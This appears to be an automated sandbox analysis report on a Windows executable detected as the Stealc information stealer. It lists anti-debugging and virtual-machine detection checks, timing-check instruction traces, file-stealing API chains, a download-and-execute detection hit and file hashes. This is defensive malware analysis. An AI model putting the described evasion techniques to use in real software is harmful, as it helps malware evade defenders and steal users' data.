Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFE02 second address: 5DFE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFF50 second address: 5DFF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E00E9 second address: 5E00ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4ACF second address: 5E4AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4AD3 second address: 5E4AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4AD7 second address: 5E4AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4AE1 second address: 5E4B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jne 00007F8B151F0E4Eh 0x00000011 nop 0x00000012 xor dx, 757Bh 0x00000017 push 00000004h 0x00000019 call 00007F8B151F0E39h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007F8B151F0E36h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B31 second address: 5E4B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B37 second address: 5E4B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8B151F0E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B41 second address: 5E4B6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8B146C0A0Fh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8B146C0A0Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B6E second address: 5E4B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8B151F0E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B79 second address: 5E4BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F8B146C0A11h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnp 00007F8B146C0A06h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6111 second address: 5E611D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B151F0E36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E9A38 second address: 5E9A42 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B146C0A06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0295 second address: 52C0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0299 second address: 52C029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C029F second address: 52C02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B151F0E45h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C02B8 second address: 52C02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C02BC second address: 52C02EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8B151F0E3Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F8B151F0E40h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ecx, 74435AF3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C02EC second address: 52C0374 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8B146C0A18h 0x00000008 jmp 00007F8B146C0A15h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8B146C0A0Eh 0x00000017 xor eax, 65588E58h 0x0000001d jmp 00007F8B146C0A0Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F8B146C0A18h 0x00000029 xor ax, 18B8h 0x0000002e jmp 00007F8B146C0A0Bh 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0374 second address: 52C0378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0378 second address: 52C037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C037C second address: 52C0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0382 second address: 52C0388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03CD second address: 52C03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03D1 second address: 52C03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03D7 second address: 52C03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 46719984h 0x00000010 mov di, C9F0h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03FC second address: 52C0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0400 second address: 52C0410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 341A8C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 519D27 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_000F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_000EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_000EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000E16D0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000E1160 GetSystemInfo,ExitProcess,

0_2_000E1160

Source: file.exe, file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001280000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: KE[OEgQEmUEr[E*`E

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000E45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_000E45C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_000F9860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F9750 mov eax, dword ptr fs:[00000030h]

0_2_000F9750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000F7850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_000F9600

Source: file.exe, file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_000F7B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_000F6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000F7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_000F7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1525663
Product:	CloudBasic
Start time:	13:50:09
Start date:	04.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1840b3a6769699f03fca969af6b4e883
SHA1:	53eeeb33aec86d2f03dc021351ffb61c1118aadd
SHA256:	247b59e9bb5df7c640981d51f2df6fd618414f802f3ce049c6fb469cf8a3a66d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by